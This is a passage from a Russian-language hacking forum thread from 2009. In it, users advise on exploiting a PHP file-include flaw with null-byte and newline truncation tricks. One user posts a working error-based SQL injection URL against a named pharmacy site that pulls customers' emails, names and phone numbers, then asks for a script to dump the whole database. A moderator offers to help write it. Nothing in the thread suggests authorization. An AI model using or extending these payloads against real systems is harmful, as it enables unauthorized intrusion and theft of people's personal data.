 |
|
13.10.2009, 13:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
удаленного нет, LFI - да.
|
|
|
13.10.2009, 13:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Glazz
Имеется следующий код на пхп:
PHP код:
if(is_file("modules/rankings/$_POST.php")){include("modules/rankings/$_POST.php");}
Можно ли , изменяя $_POST[sort], добиться удаленного инклуда или же инклуда локальных файлов без .php?
Ну попробую добавить нулевой байт и проверить. Почему бы и нет?
Просто is_file() проверяет, существует файл или нет.
Если существует > загружает.
Несуществует > Незнаю, кода дальше нету.
Удалённого несможешь.
|
|
|
|
13.10.2009, 14:12
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
С нами:
9344432
Репутация:
15
|
|
Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.
|
|
|
|
13.10.2009, 15:10
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Krist_ALL
подскажите плз
непойму как регулярки обмануть..
И откуда ты раздобыл такую увлекательную задачку..
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
13.10.2009, 15:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Glazz
он что-то конец не отбрасывает.
Как вы изволили выразится "конец отбросит" если
magic_quotes_gpc = Off
А удалённо не получится т.к. путь никуда не деть
|
|
|
|
13.10.2009, 20:07
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
Как сделать дамб БД при таком раскладе
Код:
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет). |
|
|
|
13.10.2009, 20:09
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Glazz
Как я понимаю, is_file(); не позволит инклудить удаленный файл, а вот с локальным что-то не могу разобраться. Если добавляю в конец %00, то он что-то конец не отбрасывает.
is_file() лишь проверка на существование файла.
А как уже написал jokester, директорию некуда не денешь.
Возможен фильтр на % 00 ,%0 D пробуй, %0 A.
|
|
|
|
13.10.2009, 20:22
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами:
9069748
Репутация:
438
|
|
to 2Fed123
видел я парсер на перле, помоему его в последнем хакере выкладывали
|
|
|
|
13.10.2009, 20:41
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от 2Fed123
Как сделать дамб БД при таком раскладе
Код:
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет). Проще будет самому написать.
|
|
|
|
13.10.2009, 20:48
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
Ctacok
Напиши,буду очень признателен
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
